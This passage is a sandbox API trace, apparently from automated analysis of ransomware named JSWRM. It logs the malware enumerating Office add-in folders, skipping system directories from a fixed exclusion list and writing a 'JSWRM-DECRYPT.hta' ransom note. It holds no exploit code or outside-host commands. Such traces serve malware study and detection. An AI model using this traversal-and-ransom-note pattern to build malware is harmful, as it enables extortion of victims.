ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0122.993] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.994] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.994] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ff847df, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ff847df, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ff847df, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0122.994] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0122.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0122.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0122.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0122.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0122.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.994] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0122.994] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0122.994] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0122.994] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0122.994] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0122.994] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0122.994] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0122.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0122.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0122.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0122.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0122.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0122.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.995] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1945af2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1945af2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2caa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0122.995] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0122.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0122.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0122.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.996] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7d7750, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7d7750, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7d7750, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0122.996] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0122.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0122.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0122.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.997] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e0ae4d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e0ae4d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e0ae4d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa0aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0122.997] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0122.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0122.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0122.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0122.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0122.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0122.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0122.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.997] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e0ae4d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e0ae4d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e0ae4d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa0aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0122.997] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0122.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0122.998] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="bg", cAlternateFileName="")) returned 1 [0122.998] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="...") returned 1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="windows") returned -1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="recovery") returned -1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="perflogs") returned -1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="documents and settings") returned -1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="$RECYCLE.BIN") returned 1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="system volume information") returned -1 [0122.998] lstrcmpiW (lpString1="bg", lpString2="msocache") returned -1 [0122.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0122.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0122.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0122.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0122.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0122.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0122.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\bg\\jswrm-decrypt.hta")) returned 0xffffffff [0123.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\bg\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\bg\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.009] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.009] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.010] CloseHandle (hObject=0x338) returned 1 [0123.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.010] RtlAllocateHeap (HeapHandle=0x1e0000, 